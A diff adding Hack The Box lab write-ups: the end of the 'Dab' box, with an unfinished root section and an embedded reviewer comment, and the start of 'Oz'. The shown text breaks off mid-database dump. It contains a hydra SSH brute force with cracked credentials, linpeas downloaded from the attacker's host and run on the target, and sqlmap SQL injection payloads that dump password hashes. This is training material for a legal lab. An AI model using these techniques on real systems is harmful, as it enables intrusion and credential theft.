+ eb95fc1ab8251cf1f8f870e7e4dae54d:megadeth
+ fc7992e8952a8ff5000cb7856d8586d2:Princess1
+ fe01ce2a7fbac8fafaed7c982a04e229:demo
+ 2ac9cb7dc02b3c0083eb70898e549b63:Password1
+ 254e5f2c3beb1a3d03f17253c15c07f3:hacktheplanet
+ c21f969b5f03d33d43e04f8f136e7682:default
+ 9731e89f01c1fb943cf0baa6772d2875:piggy
+ 0ef9c986fad340989647f0001e3555d4:misfits
+ 5177790ad6df0ea98db41b37b602367c:strength
+ 6f9ff93a26a118b460c878dc30e17130:monkeyman
+ 1e0ad2ec7e8c3cc595a9ec2e3762b117:blaster
+ 0daa6275280be3cf03f9f9c62f9d26d1:lovesucks1
+ :w
+
+
+
+Since the hash is what these 2 files have in common, we're going to use it to end up with a file that contains 'username:password' so that it can be ran into hydra.
+
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → cat user-hashes| while read c; do hash=$(echo ${c} | cut -d: -f1); pass=$(echo $c |cut -d: -f2); username=$(grep ${hash} users.json | cut -d: -f1 ); echo "${username}:${pass}"; done
+ "wendell":megadeth
+ "genevieve":Princess1
+ "demo":demo
+ "admin":Password1
+ "d_murphy":hacktheplanet
+ "default":default
+ "abbigail":piggy
+ "aglae":misfits
+ "irma":strength
+ "ona":monkeyman
+ "alec":blaster
+ "rick":lovesucks1
+ :
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → cat user-hashes| while read c; do hash=$(echo ${c} | cut -d: -f1); pass=$(echo $c |cut -d: -f2); username=$(grep ${hash} users.json | cut -d: -f1 ); echo "${username}:${pass}"; done > user_pass
+
+
+
+Then cut out the " characters since hydra doesn't need these (:%s/"//gi , :wq )
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → cat user_pass
+ wendell:megadeth
+ genevieve:Princess1
+ demo:demo
+ admin:Password1
+ d_murphy:hacktheplanet
+ default:default
+ abbigail:piggy
+ aglae:misfits
+ irma:strength
+ ona:monkeyman
+ alec:blaster
+ rick:lovesucks1
+
+ [ 10.10.14.16/23 ] [ /dev/pts/4 ] [~/_HTB/dab]
+ → hydra -C user_pass ssh://10.10.10.86
+ Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
+
+ Hydra (http://www.thc.org/thc-hydra) starting at 2020-01-16 14:16:00
+ [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
+ [DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries, ~1 try per task
+ [DATA] attacking ssh://10.10.10.86:22/
+ [22][ssh] host: 10.10.10.86 login: genevieve password: Princess1
+ 1 of 1 target successfully completed, 1 valid password found
+ Hydra (http://www.thc.org/thc-hydra) finished at 2020-01-16 14:16:00
+
+
+
+And we found credentials ! genevieve:Princess1 so let's login via ssh:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → ssh genevieve@10.10.10.86
+ The authenticity of host '10.10.10.86 (10.10.10.86)' can't be established.
+ ECDSA key fingerprint is SHA256:3gHAJvc1zomI4M6+oCp/3xrMyS6DMPbMFEGDbBO2Qso.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.86' (ECDSA) to the list of known hosts.
+ genevieve@10.10.10.86's password:
+ Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-133-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 0 packages can be updated.
+ 0 updates are security updates.
+
+
+ Last login: Mon Mar 26 23:42:41 2018 from 172.23.10.99
+ genevieve@dab:~$ id
+ uid=1000(genevieve) gid=1000(genevieve) groups=1000(genevieve)
+ genevieve@dab:~$ cat user.txt
+ 9bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! we managed to find the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now let's enumerate this box from genevieve's POV, to do so we'll use the linpeas script:
+
+
+ genevieve@dab:~$ which wget ; which curl
+ /usr/bin/wget
+ /usr/bin/curl
+
+
+
+Looks like both curl and wget are on the server, this means that we will be able to upload our script onto the server easily, most likely in /tmp or in /dev/shm.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/4 ] [~/_HTB/dab]
+ → wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
+ --2021-01-16 14:29:02-- https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.64.133, 151.101.0.133, 151.101.192.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.64.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 319969 (312K) [text/plain]
+ Saving to: ‘linpeas.sh’
+
+ linpeas.sh 100%[============================================================================================>] 312.47K --.-KB/s in 0.09s
+
+ 2021-01-16 14:29:02 (3.36 MB/s) - ‘linpeas.sh’ saved [319969/319969]
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/4 ] [~/_HTB/dab]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+
+
+ genevieve@dab:/dev/shm$ wget http://10.10.14.16:9090/linpeas.sh
+ --2021-01-16 08:30:02-- http://10.10.14.16:9090/linpeas.sh
+ Connecting to 10.10.14.16:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 319969 (312K) [text/x-sh]
+ Saving to: ‘linpeas.sh’
+
+ linpeas.sh 100%[============================================================================================>] 312.47K 715KB/s in 0.4s
+
+ 2021-01-16 08:30:02 (715 KB/s) - ‘linpeas.sh’ saved [319969/319969]
+
+ genevieve@dab:/dev/shm$ chmod +x linpeas.sh
+ genevieve@dab:/dev/shm$ ./linpeas.sh
+
+
+
+` 
+
+Let it run, and then you can inspect what's interesting, most importantly the /sbin/ldconfig binary has the setuid bit enabled to run as root. ldconfig:
+
+
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/5 ] [~]
+ → man ldconfig
+
+
+ DESCRIPTION
+ ldconfig creates the necessary links and cache to the most recent shared libraries found in the directories specified on the command line, in the file
+ /etc/ld.so.conf, and in the trusted directories, /lib and /usr/lib (on some 64-bit architectures such as x86-64, /lib and /usr/lib are the trusted directories for
+ 32-bit libraries, while /lib64 and /usr/lib64 are used for 64-bit libraries).
+ The cache is used by the run-time linker, ld.so or ld-linux.so. ldconfig checks the header and filenames of the libraries it encounters when determining which ver‐
+ sions should have their links updated.
+ ldconfig will attempt to deduce the type of ELF libraries (i.e., libc5 or libc6/glibc) based on what C libraries, if any, the library was linked against.
+
+
+
+The second binary we need is located in /usr/bin/myexec:
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
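Review bot: Part 3 never reaches root: after `Let it run, and then you can inspect what's interesting, most importantly the /sbin/ldconfig binary has the setuid bit enabled to run as root.` and `The second binary we need is located in /usr/bin/myexec:` the hunk is blank all the way to the Conclusion, so the linpeas findings, the analysis of `/usr/bin/myexec`, the connection between a SUID `ldconfig` (which, per the quoted man page, rebuilds the cache that `ld.so` consults for shared libraries) and that binary, the root flag, and the `Here we can see the progress graph :` image are all absent; either finish the section or mark it unfinished instead of closing with a Conclusion. Several commands also will not run as pasted: `username=^USER^&password;=^PASS^&submit;=Login` and every `&cmd;=` in the curl and wfuzz URLs carry a stray `;` that looks like an HTML-entity rendering artifact and must read `&password=`, `&submit=` and `&cmd=`. File names drift through the memcached section: the dump is written with `... | jq . > users.txt` but every later command reads `users.json`; hashcat is run on `hashes` with `-o cracked`, queried as `hashcat users-hashes --show`, and the same list is then shown with `cat user-hashes`; and the `:w` at the end of that listing is a stray vim command that produced the empty `:` entry in `user_pass`. The quoted usernames that later had to be stripped in vim come from `grep ${hash} users.json | cut -d: -f1`; `jq -r --arg h "$hash" 'to_entries[] | select(.value == $h) | .key' users.json` returns the bare key and removes that manual step. Two wording points: `here the error codes are different` should say error messages, since the only difference shown is the trailing `.` in `Login failed.` that the hydra failure string `:Login failed.<` is keyed on, and that response difference is the classic username-enumeration leak and deserves to be named as such; and `we can scan the ports from that page` undersells the finding, because `/socket?port=...&cmd=...` is a server-side TCP relay that lets anyone holding the `password=secret` cookie talk to loopback-only services, which is exactly how memcached on 11211 (which the external nmap scan did not see) becomes reachable and gives up the `users` blob. Minor: the hydra ssh run is stamped `2020-01-16` while the surrounding commands are from 2021, so that output was edited or pasted from another session.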
diff --git a/Hard/13.md b/Hard/13.md
new file mode 100644
index 0000000..fb3e9ed
--- /dev/null
+++ b/Hard/13.md
@@ -0,0 +1,618 @@
+# Oz Writeup
+
+
+
+## Introduction :
+
+Oz is a hard linux box released back in September 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/1 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.96 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Discovered open port 8080/tcp on 10.10.10.96
+ Discovered open port 80/tcp on 10.10.10.96
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/1 ] [~]
+ → nmap -sCV -p 80,8080 10.10.10.96
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-17 11:52 CET
+ Nmap scan report for 10.10.10.96
+ Host is up (0.041s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.14)
+ |_http-server-header: Werkzeug/0.14.1 Python/2.7.14
+ |_http-title: OZ webapi
+ |_http-trane-info: Problem with XML parsing of /evox/about
+ 8080/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.14)
+ | http-open-proxy: Potentially OPEN proxy.
+ |_Methods supported:CONNECTION
+ | http-title: GBR Support - Login
+ |_Requested resource was http://10.10.10.96:8080/login
+ |_http-trane-info: Problem with XML parsing of /evox/about
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 7.99 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+The nmap scan hints us towards port 80 and 8080 so let's try to enumerate it:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.96
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.96
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/01/17 11:55:43 Starting gobuster
+ ===============================================================
+ Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.96/194ad667-6357-4e67-8b9f-601382c8bc49 => 200. To force processing of Wildcard responses, specify the '--wildcard' switch
+
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.96:8080
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.96:8080
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/01/17 11:55:47 Starting gobuster
+ ===============================================================
+ Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.96:8080/d87af5e8-6226-494c-9eeb-8fd9699648b3 => 200. To force processing of Wildcard responses, specify the '--wildcard' switch
+
+
+
+Dirbusting won't help us here, so let's view the pages manually:
+
+
+
+Port 8080 gives us a login page, however there doesn't seem to be any sql injections nor can we dirbust it.
+
+
+
+Port 80 gives us a webAPI asking for an username
+
+
+
+As we give different usernames we get a different response, so let's continue from curl:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96
+
+ OZ webapi
+
+
+ ### Please register a username!
+
+
+ %
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96/nothing
+ Please register a username!%
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96/nothing2
+ GSBG0D4LRACK1065VFTSOVAP5C7PCG3TB49PFCF7MEQ6IIR0IO7M4PEMXD36ML42NTDAH4ZSALOZW9OWXT6RJ85I3XE49RA6JDT537SIGV82U5F9DR5X8SAB9WI637PGN4UBZ2K7WTBTSBQGR6Z2ZKWH39MJSFEP3AMSM2XTE9VJPTM9LSNUV7ZPPNWOJBV743Q6NMR5WNHSQ4J6O19E5S0KTFMSUUQO6OA5X2U0GZK0W0P%
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96/nothing3
+ Please register a username!%
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96/nothing4
+ DF03OPTMZ596RUG97CSR8KE2ZEP31YP95VEESEDAIT2ZFFVLLG71Q1%
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96/nothing5
+ Please register a username!%
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96/nothing6
+ KQAISB6RL5L8VGSR4JWJHE35HA77FUF1L9A1WHD8F1PNEM5MTADE0PZZ42HAIRI6H57U5CBRZGLBPD25G3EP547BMBL3RE7QWFML3879YX2FE20HRU7U5Y40WIWEXQS1H1OYYP62AW86PA6ORH9XFBTC8E6H16TNPBYVDO%
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96/nothing7
+ 38NQLZG275I1W7SJW67SPMDMR9MXIDWOSZVA6M1R990A0VQXYXVZAPOB07QF0RX9E92HZ2S3XLOV7ST0O6F4TH2710WPCOVX7TXLSUQSYNQMYIUG1W0QIZKYE8MHWCU6HI2OKPSKGXFTQG9QRAI0S4SB5X82UUGSI4N18XEQP4NIBBACYVODBYCGI15NP3AYBVNJMXRN3YN3P7BD8CPLJCY8W8KKVEPVT51BKETON14BTO4M19S2%
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96/nothing8
+ M8KAGOFMGES8MS9TS3V53ZWRHCFFAA8YVL0MZ86JRJNMJJP9JOGXV3SNUSHKJ4GG0HD7DCN1Y5X43DDE2GB5DA7WV6MWKJO4HGSP5U8WCJ9XWGJVH2B7XL8XKGVUC0FWCZPO1WTQFK49Q3DJG23VPMXEC4NFZ8435VAXDVPDBGFK3DDQFL1V3DWFWSBWTSDQRP943%
+
+
+
+
+
+We can use wfuzz to enumerate the responses from port 80, and exclude the responses that include only 1-4 words:
+
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → wfuzz -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt --hw 1,4 10.10.10.96/FUZZ
+ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.96/FUZZ
+ Total requests: 87664
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000001: 200 3 L 6 W 75 Ch "# directory-list-2.3-small.txt"
+ 000000003: 200 3 L 6 W 75 Ch "# Copyright 2007 James Fisher"
+ 000000007: 200 3 L 6 W 75 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
+ 000000014: 200 3 L 6 W 75 Ch "http://10.10.10.96/"
+ 000000006: 200 3 L 6 W 75 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
+ 000000011: 200 3 L 6 W 75 Ch "# Priority ordered case sensative list, where entries were found"
+ 000000005: 200 3 L 6 W 75 Ch "# This work is licensed under the Creative Commons"
+ 000000013: 200 3 L 6 W 75 Ch "#"
+ 000000010: 200 3 L 6 W 75 Ch "#"
+ 000000008: 200 3 L 6 W 75 Ch "# or send a letter to Creative Commons, 171 Second Street,"
+ 000000009: 200 3 L 6 W 75 Ch "# Suite 300, San Francisco, California, 94105, USA."
+ 000000012: 200 3 L 6 W 75 Ch "# on atleast 3 different hosts"
+ 000000002: 200 3 L 6 W 75 Ch "#"
+ 000000004: 200 3 L 6 W 75 Ch "#"
+ 000000202: 200 3 L 6 W 79 Ch "users"
+ ^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
+
+ Total time: 0
+ Processed Requests: 975
+ Filtered Requests: 960
+ Requests/sec.: 0
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → curl 10.10.10.96/users
+
+ OZ webapi
+
+
+ ### Please register a username!
+
+
+ %
+
+
+From here we get the username register message in bold letters, which means that something is different
+
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → curl 10.10.10.96/users -v
+ * Trying 10.10.10.96:80...
+ * Connected to 10.10.10.96 (10.10.10.96) port 80 (#0)
+ > GET /users HTTP/1.1
+ > Host: 10.10.10.96
+ > User-Agent: curl/7.74.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ * HTTP 1.0, assume close after body
+ < HTTP/1.0 200 OK
+ < Content-Type: text/html; charset=utf-8
+ < Content-Length: 79
+ < Server: Werkzeug/0.14.1 Python/2.7.14
+ < Date: Thu, 21 Jan 2021 13:44:46 GMT
+ <
+
+ OZ webapi
+
+
+ ### Please register a username!
+
+
+ * Closing connection 0
+ %
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → curl 10.10.10.96/users/ -v
+ * Trying 10.10.10.96:80...
+ * Connected to 10.10.10.96 (10.10.10.96) port 80 (#0)
+ > GET /users/ HTTP/1.1
+ > Host: 10.10.10.96
+ > User-Agent: curl/7.74.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ * HTTP 1.0, assume close after body
+ < HTTP/1.0 200 OK
+ < Content-Type: text/html; charset=utf-8
+ < Content-Length: 89
+ < Server: Werkzeug/0.14.1 Python/2.7.14
+ < Date: Thu, 21 Jan 2021 13:44:49 GMT
+ <
+
+ OZ webapi
+
+
+ ### Please register a username!
+
+
+ * Closing connection 0
+ %
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → curl 10.10.10.96/users/"'" -v
+ * Trying 10.10.10.96:80...
+ * Connected to 10.10.10.96 (10.10.10.96) port 80 (#0)
+ > GET /users/' HTTP/1.1
+ > Host: 10.10.10.96
+ > User-Agent: curl/7.74.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ * HTTP 1.0, assume close after body
+ < HTTP/1.0 500 INTERNAL SERVER ERROR
+ < Content-Type: text/html
+ < Content-Length: 291
+ < Server: Werkzeug/0.14.1 Python/2.7.14
+ < Date: Thu, 21 Jan 2021 13:44:53 GMT
+ <
+
+ 500 Internal Server Error
+
+
+ # Internal Server Error
+
+
+
+
+ The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
+
+
+ * Closing connection 0
+
+
+
+After enumerating that url we see something weird, putting ' after the url returns an internal server error with code 500. This is probably a SQL injection so let's verify that:
+
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → sqlmap -u http://10.10.10.96/users/ --batch
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 14:42:40 /2021-01-21/
+
+ [14:42:40] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
+ do you want to try URI injections in the target URL itself? [Y/n/q] Y
+ [14:42:40] [INFO] testing connection to the target URL
+ [14:42:40] [INFO] checking if the target is protected by some kind of WAF/IPS
+ [14:42:40] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
+ are you sure that you want to continue with further target testing? [Y/n] Y
+ [14:42:40] [WARNING] please consider usage of tamper scripts (option '--tamper')
+ [14:42:40] [INFO] testing if the target URL content is stable
+ [14:42:41] [INFO] target URL content is stable
+ [14:42:41] [INFO] testing if URI parameter '#1*' is dynamic
+ [14:42:41] [INFO] URI parameter '#1*' appears to be dynamic
+ [14:42:41] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
+ [14:42:41] [INFO] testing for SQL injection on URI parameter '#1*'
+ [14:42:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
+ [14:42:42] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
+ [14:42:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
+ [14:42:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
+ [14:42:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
+ [14:42:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
+ [14:42:45] [INFO] testing 'Generic inline queries'
+ [14:42:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
+ [14:42:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
+ [14:42:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
+ [14:42:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
+ [14:42:58] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
+ it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
+ for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
+ [14:42:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
+ [14:42:58] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
+ [14:43:01] [INFO] target URL appears to be UNION injectable with 1 columns
+ [14:43:01] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
+ URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
+ sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:
+ ---
+ Parameter: #1* (URI)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: http://10.10.10.96:80/users/' AND (SELECT 5564 FROM (SELECT(SLEEP(5)))XXXV) AND 'JCgZ'='JCgZ
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 1 column
+ Payload: http://10.10.10.96:80/users/' UNION ALL SELECT CONCAT(0x716b6a6a71,0x4c53726344695a75686c4c714a766e4e56545a5a4b4c61655457764361447776536a684645747a54,0x716a767071)-- -
+ ---
+ [14:43:01] [INFO] the back-end DBMS is MySQL
+ back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
+ [14:43:01] [WARNING] HTTP error codes detected during run:
+ 500 (Internal Server Error) - 40 times
+ [14:43:01] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
+
+ [*] ending @ 14:43:01 /2021-01-21/
+
+
+
+
+And here we see that the URL parameter is vulnerable, so let's enumerate it further to get the databases available:
+
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → sqlmap -u http://10.10.10.96/users/ --dbs --batch
+
+ available databases [4]:
+ [*] information_schema
+ [*] mysql
+ [*] ozdb
+ [*] performance_schema
+
+ [14:44:45] [WARNING] HTTP error codes detected during run:
+ 500 (Internal Server Error) - 1 times
+ [14:44:45] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
+
+ [*] ending @ 14:44:45 /2021-01-21/
+
+
+
+Now let's enumerate annd see if we can find password hashes:
+
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → sqlmap -u http://10.10.10.96/users/ --passwords --batch
+
+ ---
+ [14:45:17] [INFO] the back-end DBMS is MySQL
+ back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
+ [14:45:17] [INFO] fetching database users password hashes
+ [14:45:18] [INFO] retrieved: 'root',''
+ [14:45:18] [INFO] retrieved: 'dorthi',''
+ [14:45:18] [INFO] retrieved: 'root',''
+ [14:45:18] [INFO] retrieved: 'root','*61A2BD98DAD2A09749B6FC77A9578609D32518DD'
+ [14:45:18] [INFO] retrieved: 'dorthi','*43AE542A63D9C43FF9D40D0280CFDA58F6C747CA'
+ [14:45:18] [INFO] retrieved: 'root','*61A2BD98DAD2A09749B6FC77A9578609D32518DD'
+ do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
+ do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
+ [14:45:19] [INFO] using hash method 'mysql_passwd'
+ what dictionary do you want to use?
+ [1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
+ [2] custom dictionary file
+ [3] file with list of dictionary files
+ > 1
+ [14:45:19] [INFO] using default dictionary
+ do you want to use common password suffixes? (slow!) [y/N] N
+ [14:45:19] [INFO] starting dictionary-based cracking (mysql_passwd)
+ [14:45:19] [INFO] starting 3 processes
+ [14:45:31] [WARNING] no clear password(s) found
+ database management system users password hashes:
+ [*] dorthi [1]:
+ password hash: *43AE542A63D9C43FF9D40D0280CFDA58F6C747CA
+ [*] root [1]:
+ password hash: *61A2BD98DAD2A09749B6FC77A9578609D32518DD
+
+ [14:45:31] [WARNING] HTTP error codes detected during run:
+ 500 (Internal Server Error) - 2 times
+ [14:45:31] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
+
+ [*] ending @ 14:45:31 /2021-01-21/
+
+
+Now let's see if we can get the contents of the ozdb database:
+
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → sqlmap -u http://10.10.10.96/users/ -D ozdb --batch --dump
+ ___
+ Table: users_gbw
+ [6 entries]
+ +----+----------------------------------------------------------------------------------------+-------------+
+ | id | password | username |
+ +----+----------------------------------------------------------------------------------------+-------------+
+ | 1 | $pbkdf2-sha256$5000$aA3h3LvXOseYk3IupVQKgQ$ogPU/XoFb.nzdCGDulkW3AeDZPbK580zeTxJnG0EJ78 | dorthi |
+ | 2 | $pbkdf2-sha256$5000$GgNACCFkDOE8B4AwZgzBuA$IXewCMHWhf7ktju5Sw.W.ZWMyHYAJ5mpvWialENXofk | tin.man |
+ | 3 | $pbkdf2-sha256$5000$BCDkXKuVMgaAEMJ4z5mzdg$GNn4Ti/hUyMgoyI7GKGJWeqlZg28RIqSqspvKQq6LWY | wizard.oz |
+ | 4 | $pbkdf2-sha256$5000$bU2JsVYqpbT2PqcUQmjN.Q$hO7DfQLTL6Nq2MeKei39Jn0ddmqly3uBxO/tbBuw4DY | coward.lyon |
+ | 5 | $pbkdf2-sha256$5000$Zax17l1Lac25V6oVwnjPWQ$oTYQQVsuSz9kmFggpAWB0yrKsMdPjvfob9NfBq4Wtkg | toto |
+ | 6 | $pbkdf2-sha256$5000$d47xHsP4P6eUUgoh5BzjfA$jWgyYmxDK.slJYUTsv9V9xZ3WWwcl9EBOsz.bARwGBQ | admin |
+ +----+----------------------------------------------------------------------------------------+-------------+
+
+ [14:47:36] [INFO] retrieved: 'db information loaded to ticket application for shared db access','12','GBR-9872'
+ Database: ozdb
+ Table: tickets_gbw
+ [12 entries]
+ +----+----------+--------------------------------------------------------------------------------------------------------------------------------+
+ | id | name | desc |
+ +----+----------+--------------------------------------------------------------------------------------------------------------------------------+
+ | 1 | GBR-987 | Reissued new id_rsa and id_rsa.pub keys for ssh access to dorthi. |
+ | 2 | GBR-1204 | Where did all these damn monkey's come from!? I need to call pest control. |
+ | 3 | GBR-1205 | Note to self: Toto keeps chewing on the curtain, find one with dog repellent. |
+ | 4 | GBR-1389 | Nothing to see here... V2hhdCBkaWQgeW91IGV4cGVjdD8= |
+ | 5 | GBR-4034 | Think of a better secret knock for the front door. Doesn't seem that secure, a Lion got in today. |
+ | 6 | GBR-5012 | I bet you won't read the next entry. |
+ | 7 | GBR-7890 | HAHA! Made you look. |
+ | 8 | GBR-7945 | Dorthi should be able to find her keys in the default folder under /home/dorthi/ on the db. |
